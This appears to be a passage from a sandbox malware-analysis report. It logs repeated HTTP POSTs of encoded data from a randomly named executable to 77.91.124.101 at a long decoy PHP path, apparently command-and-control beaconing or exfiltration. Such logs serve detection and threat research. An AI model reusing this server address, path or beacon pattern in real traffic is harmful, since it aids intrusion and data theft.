Nov 21, 2023 04:48:54.400331020 CET	673	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	77.91.124.101	80	192.168.2.5	49846	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:54.733474016 CET	673	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:54.930938959 CET	674	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:54.931238890 CET	676	OUT	Data Raw: 57 5e 58 5f 5e 5f 5a 50 5d 57 55 57 55 5f 57 53 50 5a 58 44 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^X_^_ZP]WUWU_WSPZXDVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!?+* #,$)#1+3=13#=,8)??4->&G''^)#
Nov 21, 2023 04:48:55.134145021 CET	676	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.5	49846	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:54.733474016 CET	673	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:54.930938959 CET	674	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:54.931238890 CET	676	OUT	Data Raw: 57 5e 58 5f 5e 5f 5a 50 5d 57 55 57 55 5f 57 53 50 5a 58 44 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^X_^_ZP]WUWU_WSPZXDVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!?+* #,$)#1+3=13#=,8)??4->&G''^)#
Nov 21, 2023 04:48:55.134145021 CET	676	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.5	49847	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:55.457685947 CET	677	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:55.654196978 CET	677	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:55.654433966 CET	680	OUT	Data Raw: 57 58 58 5a 5b 53 5a 5e 5d 57 55 57 55 59 57 57 50 5c 58 47 56 51 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXXZ[SZ^]WUWUYWWP\XGVQWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=1?=;;$1 :5](#$->P$-,;:Y<(->&G''^)
Nov 21, 2023 04:48:55.856467009 CET	680	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	77.91.124.101	80	192.168.2.5	49847	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:55.457685947 CET	677	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:55.654196978 CET	677	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:55.654433966 CET	680	OUT	Data Raw: 57 58 58 5a 5b 53 5a 5e 5d 57 55 57 55 59 57 57 50 5c 58 47 56 51 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXXZ[SZ^]WUWUYWWP\XGVQWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=1?=;;$1 :5](#$->P$-,;:Y<(->&G''^)
Nov 21, 2023 04:48:55.856467009 CET	680	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.5	49848	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:56.192643881 CET	681	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:56.390491009 CET	681	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:57.889027119 CET	684	OUT	Data Raw: 57 5a 58 5c 5e 5d 5f 5e 5d 57 55 57 55 5e 57 51 50 53 58 49 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZX\^]_^]WUWU^WQPSXIVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>+!_+>W=0 82[4*+&R$=>V0V>-;:<$8>&G''^)/
Nov 21, 2023 04:48:58.091731071 CET	684	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	77.91.124.101	80	192.168.2.5	49848	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:56.192643881 CET	681	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:56.390491009 CET	681	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:57.889027119 CET	684	OUT	Data Raw: 57 5a 58 5c 5e 5d 5f 5e 5d 57 55 57 55 5e 57 51 50 53 58 49 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZX\^]_^]WUWU^WQPSXIVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>+!_+>W=0 82[4*+&R$=>V0V>-;:<$8>&G''^)/
Nov 21, 2023 04:48:58.091731071 CET	684	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49726	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:35.397778988 CET	197	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:35.594356060 CET	197	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:35.594820023 CET	200	OUT	Data Raw: 52 5d 58 5c 5e 5a 5a 5c 5d 57 55 57 55 58 57 52 50 5b 58 44 56 56 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X\^ZZ\]WUWUXWRP[XDVVW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^!_?(!)0;;7%7:1X< 5$=:& *,+&X+->&G''^)?
Nov 21, 2023 04:47:35.797945976 CET	200	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	77.91.124.101	80	192.168.2.5	49726	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:35.397778988 CET	197	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:35.594356060 CET	197	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:35.594820023 CET	200	OUT	Data Raw: 52 5d 58 5c 5e 5a 5a 5c 5d 57 55 57 55 58 57 52 50 5b 58 44 56 56 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X\^ZZ\]WUWUXWRP[XDVVW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^!_?(!)0;;7%7:1X< 5$=:& *,+&X+->&G''^)?
Nov 21, 2023 04:47:35.797945976 CET	200	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49727	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:36.113682032 CET	201	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:36.311444998 CET	201	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:36.311707973 CET	204	OUT	Data Raw: 57 50 5d 59 5b 5b 5a 5f 5d 57 55 57 55 5c 57 52 50 53 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Y[[Z_]WUWU\WRPSXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+5<:)8/B6]#!Y< "R&.:Q'29+9?X/&G''^)/
Nov 21, 2023 04:47:36.515629053 CET	204	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	77.91.124.101	80	192.168.2.5	49727	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:36.113682032 CET	201	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:36.311444998 CET	201	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:36.311707973 CET	204	OUT	Data Raw: 57 50 5d 59 5b 5b 5a 5f 5d 57 55 57 55 5c 57 52 50 53 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Y[[Z_]WUWU\WRPSXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+5<:)8/B6]#!Y< "R&.:Q'29+9?X/&G''^)/
Nov 21, 2023 04:47:36.515629053 CET	204	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49728	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:36.833880901 CET	205	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:37.031764984 CET	205	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:37.032001972 CET	208	OUT	Data Raw: 57 59 5d 5e 5e 58 5a 59 5d 57 55 57 55 5d 57 55 50 53 58 48 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]^^XZY]WUWU]WUPSXHV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(Z(;=+_/76_#!^+>R$.>R002-8*\</.&G''^)+
Nov 21, 2023 04:47:37.236182928 CET	208	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	77.91.124.101	80	192.168.2.5	49728	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:36.833880901 CET	205	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:37.031764984 CET	205	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:37.032001972 CET	208	OUT	Data Raw: 57 59 5d 5e 5e 58 5a 59 5d 57 55 57 55 5d 57 55 50 53 58 48 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]^^XZY]WUWU]WUPSXHV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(Z(;=+_/76_#!^+>R$.>R002-8*\</.&G''^)+
Nov 21, 2023 04:47:37.236182928 CET	208	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	77.91.124.101	80	192.168.2.5	49729	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:37.555521011 CET	209	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:37.755810976 CET	209	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:37.756151915 CET	212	OUT	Data Raw: 52 5d 5d 5d 5b 59 5f 5b 5d 57 55 57 55 56 57 51 50 59 58 42 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]][Y_[]WUWUVWQPYXBV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^5Z?))7;44=(P'>.W$!,(9+,/.&G''^)
Nov 21, 2023 04:47:37.961127996 CET	212	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49729	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:37.555521011 CET	209	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:37.755810976 CET	209	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:37.756151915 CET	212	OUT	Data Raw: 52 5d 5d 5d 5b 59 5f 5b 5d 57 55 57 55 56 57 51 50 59 58 42 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]][Y_[]WUWUVWQPYXBV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^5Z?))7;44=(P'>.W$!,(9+,/.&G''^)
Nov 21, 2023 04:47:37.961127996 CET	212	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49730	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

